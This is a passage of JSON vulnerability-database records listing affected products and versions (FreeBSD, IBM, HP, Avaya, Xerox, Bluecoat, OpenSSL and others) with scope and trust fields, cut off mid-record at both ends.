"version": "5.2.2" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "2.2" }, { "model": "linux mips", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "workcentre spar", "scope": "ne", "trust": 0.3, "vendor": "xerox", "version": "7525061.121.225.06100" }, { "model": "scale out network attached storage", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.0.5" }, { "model": "security network intrusion prevention system gx7412-05", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.4" }, { "model": "hp-ux b.11.11", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "security network intrusion prevention system gx5108-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5" }, { "model": "-release-p1", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "7.1" }, { "model": "9.3-beta1-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "workcentre r14-11 spar", "scope": "ne", "trust": 0.3, "vendor": "xerox", "version": "7835072.010.134.32804" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.3" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.4.1" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "14.1" }, { "model": "aura communication manager utility services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.5.0.15" }, { "model": "security network intrusion prevention system gx5208-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.1" }, { "model": "8-stable", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2" }, { "model": "storage provisioning manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.4" }, { "model": "security analytics platform", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "6.6.9" }, { "model": "flex system compute node", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x2227916" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.0.0" }, { "model": "-release-p6", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "6.3" }, { "model": "8.4-rc1-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "-release-p5", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.1" }, { "model": "qradar risk manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.3" }, { "model": "-releng", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.5" }, { "model": "flex system fc3171 8gb san pass-thru", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.1" }, { "model": "8.1-release-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "security network intrusion prevention system gx5108-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.4" }, { "model": "8.0-stable", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "7.1-release-p6", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.0" }, { "model": "scale out network attached storage", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.3.4" }, { "model": "cloudsystem matrix", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.2" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.0" }, { "model": "-stablepre050201", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.2" }, { "model": "8.4-release-p14", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "-release-p9", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "7.0" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.5.0" }, { "model": "aura system manager sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "insight control server deployment", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.1" }, { "model": "project openssl 0.9.8l", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.1.1" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "9.2-" }, { "model": "9.1-release-p18", "scope": "ne", "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "websphere datapower soa appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0.1.2" }, { "model": "-stable", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.2" }, { "model": "flex system fc3171 8gb san pass-thru", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "10.0-release-p4", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.20" }, { "model": "matrix operating environment", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.4" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.1" }, { "model": "icewall sso dfw r2", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "8.0" }, { "model": "7.3-releng", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "project openssl 1.0.1i", "scope": "ne", "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.0n", "scope": "ne", "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl h", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.3" }, { "model": "aura session manager sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "i v5r4", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "3.4x" }, { "model": "one-x client enablement services sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "image construction and composition tool", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.3" }, { "model": "security network intrusion prevention system gx4002", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.0.x" }, { "model": "ip office server edition", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "8.1" }, { "model": "project openssl i", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "-releng", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.4" }, { "model": "one-x client enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "7.4-releng", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "websphere datapower soa appliance", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "6.0.0.9" }, { "model": "scale out network attached storage", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.3.3" }, { "model": "project openssl 1.0.0i", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "2.0" }, { "model": "10.0-release-p6", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "server migration pack", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "7.5.1" }, { "model": "hp-ux b.11.11 (11i", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "v1)" }, { "model": "tivoli netcool system service monitor fp1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.1" }, { "model": "storage provisioning manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.2.2" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "1.0" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.2" }, { "model": "security network intrusion prevention system gx7412", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.2" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.4.1" }, { "model": "i v5r3", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "10" }, { "model": "hp-ux b.11.23", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "-stable", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "6.0" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "2.2.7" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "7.3" }, { "model": "scale out network attached storage", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.0.4" }, { "model": "6.4-release-p2", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "flex system compute node", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x8804259" }, { "model": "10.0-release-p2", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "i v5r4", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "9.1-release-p15", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "ssl for openvms", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "1.4-493" }, { "model": "-release", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.10" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "9.3" }, { "model": "proxysg sgos", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "6.5.4.4" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.3.8.3" }, { "model": "tssc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3.1" }, { "model": "7.0-release-p3", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "1.1.5.1" }, { "model": "-stable", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "6.4" }, { "model": "iq", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1.1" }, { "model": "system m4", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x37508752" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "3.5.1" }, { "model": "colorqube r14-11 spar", "scope": "ne", "trust": 0.3, "vendor": "xerox", "version": "8700072.161.134.32804" }, { "model": "scale out network attached storage", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.2.3" }, { "model": "8.2-release-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.3" }, { "model": "-releng", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.1" }, { "model": "snapdrive for windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.3" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.3.9.3" }, { "model": "x-series xos", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "8.5" }, { "model": "insight control server provisioning", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.5.0" }, { "model": "insight control server provisioning", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.4.0" }, { "model": "proxysg sgos", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "6.4" }, { "model": "security network intrusion prevention system gx5008-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.1" }, { "model": "i v5r3", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "9.3-prerelease", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "project openssl 1.0.0e", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "security network intrusion prevention system gx5208", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.2" }, { "model": "8.3-release-p6", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "security network intrusion prevention system gx7800", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.1" }, { "model": "project openssl beta1", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0" }, { "model": "icewall sso dfw", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "8.0" }, { "model": "storage provisioning manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.2" }, { "model": "aura communication manager utility services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3" }, { "model": "6.4-release-p4", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "security network intrusion prevention system gx7412-10", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3" }, { "model": "project openssl a", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "9.2-releng", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "security network intrusion prevention system gv1000", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.2" }, { "model": "system management homepage", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "7.5.5" }, { "model": "business server", "scope": "eq", "trust": 0.3, "vendor": "mandriva", "version": "1x8664" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "3.5" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "3.5x" }, { "model": "8.4-releng", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "x-series xos", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "9.0" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3" }, { "model": "project openssl c", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "-release-p7", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.8" }, { "model": "-release-p32", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.5" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.10" }, { "model": "security network intrusion prevention system gx7412-05", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6" }, { "model": "proxysg sgos", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "6.3" }, { "model": "aura collaboration environment", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "2.0" }, { "model": "insight control server deployment", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.1.2" }, { "model": "system m4", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x36307158" }, { "model": "7.0-release", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.1" }, { "model": "workcentre", "scope": "ne", "trust": 0.3, "vendor": "xerox", "version": "5745061.132.224.35203" }, { "model": "icewall sso agent option", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "8" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8x" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.2" }, { "model": "ip office application server sp", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "9.01" }, { "model": "communication server 1000m", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "storage provisioning manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.3.2" }, { "model": "upward integration modules hardware management pack", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "5.5.3" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "2.2.6" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.4" }, { "model": "icewall sso dfw", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "10.0" }, { "model": "upward integration modules integrated installer", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "5.5.3" }, { "model": "workcentre r14-11 spar", "scope": "ne", "trust": 0.3, "vendor": "xerox", "version": "7830072.010.134.32804" }, { "model": "-stable", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "6.2" }, { "model": "insight control server deployment", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.1" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.3" }, { "model": "security network intrusion prevention system gx4004", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.1" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.4" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.3" }, { "model": "project openssl 0.9.8t", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "-release-p20", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.11" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "6.1" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "colorqube", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "93020" }, { "model": "10.0-release-p8", "scope": "ne", "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "communication server 1000m signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "security network intrusion prevention system gx4004-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3" }, { "model": "arx", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "6.1.1" }, { "model": "security network intrusion prevention system gx5108-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6" }, { "model": "puredata system for operational analytics", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0" }, { "model": "8.1-release", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "security network intrusion prevention system gx5008", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.2" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.6" }, { "model": "bladecenter advanced management module 3.66g", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "aura messaging", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "communication server 1000e", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "8.4-rc2-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "58550" }, { "model": "project openssl 1.0.0c", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "colorqube r14-11 spar", "scope": "ne", "trust": 0.3, "vendor": "xerox", "version": "8900072.161.134.32804" }, { "model": "linerate", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "2.4.1" }, { "model": "9.3-rc2", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "qradar vulnerability manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.3" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "3.1x" }, { "model": "9.3-rc3-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "flex system compute node", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x2408737" }, { "model": "9.0--releng", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "data ontap smi-s agent", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.2" }, { "model": "9.2-rc1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "8.0" }, { "model": "security network intrusion prevention system gx4002", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.1" }, { "model": "scale out network attached storage", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.3.2" }, { "model": "7.4-release-p2", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "-releng", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "7.0" }, { "model": "colorqube r14-11 spar", "scope": "ne", "trust": 0.3, "vendor": "xerox", "version": "9302072.180.134.32804" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "6.0.x" }, { "model": "websphere datapower soa appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.01" }, { "model": "9.0-releng", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "x-series xos", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "9.5" }, { "model": "security network intrusion prevention system gx7412", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5" }, { "model": "ip office application server sp", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "9.02" }, { "model": "-releng", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.6" }, { "model": "cloudsystem matrix", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.3" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.1" }, { "model": "rc1", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "7.1" }, { "model": "aura experience portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.2" }, { "model": "workcentre r14-11 spar", "scope": "ne", "trust": 0.3, "vendor": "xerox", "version": "3655072.060.134.32804" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.2" }, { "model": "8.4-stable", "scope": "ne", "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "release -p3", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "8.2-" }, { "model": "8.1-prerelease", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "57550" }, { "model": "linux lts", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "14.04" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.4" }, { "model": "9.3-rc1-p2", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "security network intrusion prevention system gx3002", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6" }, { "model": "tivoli netcool system service monitor fp14", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "security network intrusion prevention system gx7412-05", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3" }, { "model": "project openssl 1.0.0f", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "linux lts i386", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "12.04" }, { "model": "project openssl d", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "2.2x" }, { "model": "tivoli management framework", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1.1" }, { "model": "cloudsystem matrix", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3" }, { "model": "7.4-stable", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "1.0" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "1.1" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.1" }, { "model": "9.2-stable", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "scale out network attached storage", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.2.0" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1" }, { "model": "snapdrive for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2" }, { "model": "security network intrusion prevention system gx5208", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.12" }, { "model": "sterling connect:direct for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0" }, { "model": "proxysg sgos", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "6.5" }, { "model": "security network intrusion prevention system gx4004-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5" }, { "model": "project openssl 1.0.0j", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "matrix operating environment", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2" }, { "model": "project openssl 1.0.0b", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.1" }, { "model": "security network intrusion prevention system gv1000", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5" }, { "model": "aura presence services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.10" }, { "model": "linerate", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "2.2.1" }, { "model": "8-releng", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "aura experience portal sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "-prerelease", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.4" }, { "model": "proventia network security controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.1209" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.6" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.3" }, { "model": "7.3-release-p3", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "ssl for openvms", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "1.4-471" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.0" }, { "model": "cacheflow", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "2.2" }, { "model": "8.2-release", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "system m4", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x32502583" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.2" }, { "model": "9.2-release-p9", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "enterprise linux server aus", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6.5" }, { "model": "scale out network attached storage", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.0.0" }, { "model": "-release-p38", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.3" }, { "model": "security network intrusion prevention system gx5208", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.4" }, { "model": "aura presence services sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "tssc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3.15" }, { "model": "aura system manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3.3" }, { "model": "security network intrusion prevention system gx4004-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.4" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.1.2" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.5" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.1.1" }, { "model": "colorqube", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "93030" }, { "model": "security network intrusion prevention system gv1000", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.4" }, { "model": "aura system manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "hp-ux b.11.31", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "freebsd", "scope": 